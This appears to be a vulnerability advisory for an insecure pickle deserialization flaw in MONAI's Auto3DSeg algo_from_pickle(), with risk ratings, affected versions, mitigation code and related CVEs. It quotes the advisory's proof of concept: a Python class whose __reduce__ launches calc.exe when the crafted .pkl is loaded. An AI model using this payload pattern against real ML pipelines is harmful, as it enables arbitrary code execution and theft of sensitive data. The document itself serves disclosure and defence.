MONAI's Auto3DSeg module deserializes pickle files via algo_from_pickle() with zero input validation, allowing any actor who can supply a crafted .pkl file to achieve arbitrary code execution with ML pipeline privileges. With 99 downstream dependents and MONAI widely deployed in clinical and research medical imaging workflows, the blast radius is significant — a single poisoned algorithm checkpoint can cascade to full host compromise, including access to sensitive patient imaging datasets. Although the CVSS vector rates attack complexity as high and requires privileged access and user interaction, the actual exploit payload is a five-line Python script using only the standard library, making weaponization trivial once an attacker can influence which files the pipeline loads. Upgrade to MONAI 1.5.2 immediately; in the interim, enforce strict write-access controls on all directories containing .pkl files consumed by Auto3DSeg pipelines.
Risk Assessment
High severity, with a critical impact profile when triggered: the CVSS scope change plus C:H/I:H/A:H means full system compromise, including data exfiltration and persistence, once the preconditions are met. The AC:H and PR:H ratings reduce the likelihood of opportunistic exploitation, but insider threats, shared-storage poisoning, and supply chain scenarios in research GPU clusters are highly plausible. There is no EPSS data, no CISA KEV listing, and no public exploit tool yet — but the advisory's PoC is trivially reproducible. Medical imaging AI environments processing protected health information face compounded regulatory exposure under HIPAA alongside the technical risk.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| monai | pip | <= 1.5.1 | 1.5.2 |
If you run monai at version 1.5.1 or earlier, you are affected.
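A quick way to check whether an environment falls in the vulnerable range, sketched with only the standard library (the version comparison below is a simplified assumption that handles plain numeric `X.Y.Z` versions, not full PEP 440 strings):

```python
# Report whether the installed MONAI falls in the vulnerable range (<= 1.5.1).
# The tuple-based comparison is an illustrative sketch, not a full PEP 440 parser.
from importlib.metadata import PackageNotFoundError, version


def parse_version(ver: str) -> tuple[int, ...]:
    # "1.5.1" -> (1, 5, 1); tuples compare element-wise, like versions do
    return tuple(int(part) for part in ver.split("."))


def version_is_vulnerable(ver: str) -> bool:
    return parse_version(ver) <= parse_version("1.5.1")


def monai_is_vulnerable() -> bool:
    try:
        return version_is_vulnerable(version("monai"))
    except PackageNotFoundError:
        return False  # monai is not installed in this environment


if __name__ == "__main__":
    print("vulnerable" if monai_is_vulnerable() else "patched or not installed")
```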
Recommended Action
- Upgrade monai to >=1.5.2 immediately — the official patch is available as of 2026-04-05.
- Audit all direct and transitive calls to algo_from_pickle() across your codebase, Jupyter notebooks, and CI/CD pipelines.
- Until patched, restrict write access to directories from which .pkl files are loaded to only the owning process account — deny write access for all other identities.
- Implement SHA-256 manifest files with cryptographic signatures for all serialized algorithm artifacts; verify before loading.
- Consider migrating algorithm persistence to safe serialization formats (JSON configs + safetensors weights) for new pipelines.
- Add SIEM/EDR rules to alert on subprocess execution spawned by Python ML training processes — this is the primary post-exploitation indicator.
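The manifest mitigation above can be sketched as follows. This is a digest-only illustration (file names and the JSON manifest format are assumptions, not part of MONAI's API); a real deployment should additionally sign the manifest so an attacker with write access cannot simply regenerate it.

```python
# Sketch: compute SHA-256 digests for .pkl artifacts and refuse to load any
# file whose digest is missing from, or disagrees with, a trusted manifest.
import hashlib
import json
from pathlib import Path


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()


def write_manifest(artifact_dir: Path, manifest: Path) -> None:
    # Record a digest for every .pkl artifact in the directory
    digests = {p.name: sha256_of(p) for p in sorted(artifact_dir.glob("*.pkl"))}
    manifest.write_text(json.dumps(digests, indent=2))


def verify_before_load(pkl_path: Path, manifest: Path) -> None:
    digests = json.loads(manifest.read_text())
    expected = digests.get(pkl_path.name)
    if expected is None or sha256_of(pkl_path) != expected:
        raise ValueError(f"refusing to load untrusted artifact: {pkl_path}")
```

Call `verify_before_load()` immediately before any `algo_from_pickle()` call so a tampered or unexpected artifact fails closed instead of being deserialized.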
Technical Details
NVD Description
### Summary

The `algo_from_pickle` function in `monai/auto3dseg/utils.py` calls `pickle.loads(data_bytes)` without performing any validation on its input. This insecure deserialization can lead to code execution.

### Details

PoC — generate the malicious file `attack_algo.pkl`:

```python
import pickle
import subprocess

class MaliciousAlgo:
    def __reduce__(self):
        return (subprocess.call, (['calc.exe'],))

malicious_algo_bytes = pickle.dumps(MaliciousAlgo())

attack_data = {
    "algo_bytes": malicious_algo_bytes,
}

attack_pickle_file = "attack_algo.pkl"
with open(attack_pickle_file, "wb") as f:
    f.write(pickle.dumps(attack_data))
```

Then load it through the vulnerable API:

```python
from monai.auto3dseg.utils import algo_from_pickle

attack_pickle_file = "attack_algo.pkl"
result = algo_from_pickle(attack_pickle_file)
```

Loading the file triggers `pickle.loads`, which executes the embedded command.

<img width="909" height="534" alt="image" src="https://github.com/user-attachments/assets/071adbb7-3e40-4651-be48-abd2ce32470f" />

Cause of the vulnerability:

```python
def algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any:
    with open(pkl_filename, "rb") as f_pi:
        data_bytes = f_pi.read()
    data = pickle.loads(data_bytes)
```

### Impact

Arbitrary code execution.

### Repair suggestions

Verify the data source and content before deserializing, or use a safe deserialization method.
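One way to implement the advisory's "safe deserialization" suggestion is an allow-list `Unpickler`. The sketch below is not MONAI's fix; the allow-list contents are an assumption and would need to cover whatever benign types Auto3DSeg actually serializes. The point is that a `__reduce__` payload resolving to `subprocess.call`, as in the PoC above, is rejected before it can run.

```python
# Sketch: restricted unpickling via an allow-list of (module, name) globals.
# Anything outside the allow-list raises instead of being imported and called.
import io
import pickle

# Illustrative allow-list only; extend for the types your artifacts really use.
ALLOWED_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "str"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module: str, name: str):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)

def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers of primitives deserialize normally, while a pickle that tries to resolve any callable outside the allow-list fails with `UnpicklingError` instead of executing it.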
Exploitation Scenario
An adversary with write access to a shared NAS, S3 bucket, or MLflow artifact store used by an Auto3DSeg hyperparameter optimization cluster crafts a malicious .pkl file using the published PoC — a subprocess.call payload wrapped in a Python class with a custom __reduce__ method. When the automated training pipeline or an ML engineer calls algo_from_pickle() to resume an experiment or load a previously searched algorithm configuration, the deserialized payload executes silently: a reverse shell is established, GPU cluster credentials are harvested, and model weights alongside DICOM training data are exfiltrated to attacker-controlled storage. In air-gapped clinical AI environments, the same attack vector can be delivered via a compromised developer workstation or a poisoned shared experiment artifact committed to a collaborative repository.
Weaknesses (CWE)
CWE-502: Deserialization of Untrusted Data
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
Related Vulnerabilities
- CVE-2025-58757 (8.8) — MONAI: unsafe pickle deserialization RCE in data pipeline (same package: monai)
- CVE-2025-58755 (8.8) — MONAI: path traversal allows arbitrary file write (same package: monai)
- CVE-2025-58756 (8.8) — MONAI: unsafe deserialization in CheckpointLoader allows RCE (same package: monai)
- CVE-2026-21851 (5.3) — monai: path traversal enables file access (same package: monai)
- CVE-2024-2912 (10.0) — BentoML: RCE via insecure deserialization (same attack type: supply chain)